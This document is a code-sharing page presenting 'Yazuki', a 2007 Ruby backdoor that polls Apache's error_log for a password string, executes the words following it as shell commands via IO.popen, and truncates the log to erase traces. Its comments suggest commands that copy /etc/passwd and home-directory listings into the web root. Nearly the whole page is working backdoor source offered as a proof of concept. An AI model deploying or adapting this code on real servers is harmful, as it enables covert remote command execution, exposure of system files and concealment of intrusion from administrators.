Xairro.com

Yazuki - Apache error_log backdoor

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
#!/usr/bin/env ruby 
# Name: Yazuki 
# Author: SkyOut 
# Date: October 2007 
# Contact: skyout[-at-]smash-the-stack[-dot-]net 
# Website: http://www.smash-the-stack.net/ 
# Used Ruby Version. 1.8.4 
# Tested on: OpenBSD 4.1 
# This Proof-of-Concept code shows a simple backdoor 
# concept, that does not need any open port to execute 
# shell commands. Yazuki will search the error_log file 
# of Apache every 5 seconds for a specified password and 
# executes the given command, that can have up to five 
# arguments (for more, just edit line 41). 
# Possible commands: (Make sure to always have five arguments 
# or edit line 41) 
# less /etc/passwd > /var/www/htdocs/pw.txt ; 
# ls -a /home > /var/www/htdocs/home.txt 
# Start an indefinite loop
x = 0 
while (x == 0) 
   # Define the error_log file of Apache 
   error_log = "/var/www/logs/error_log" 
   # Open Apaches error_log file 
   if (File.file?(error_log)) 
      if (File.readable?(error_log)) 
         File.open("#{error_log}").each { |line| 
            # Define the password 
            if line =~ /ourpassword/ 
             # Make an array of the error_log line 
             array = line.split(" "); 
             # Take the 5 last arguments 
             command = array.fetch(13) + " " + array.fetch(14) + " " + 
             array.fetch(15) + " " + array.fetch(16) + " " + array.fetch(17) 
             # Execute the command 
             IO.popen("#{command}") 
             # Truncate the error_log file again 
             if (File.writable?(error_log)) 
             File.truncate(error_log, 0) 
             end 
            end 
         } 
      end 
   end 
   # Wait 5 seconds 
   sleep 5 
end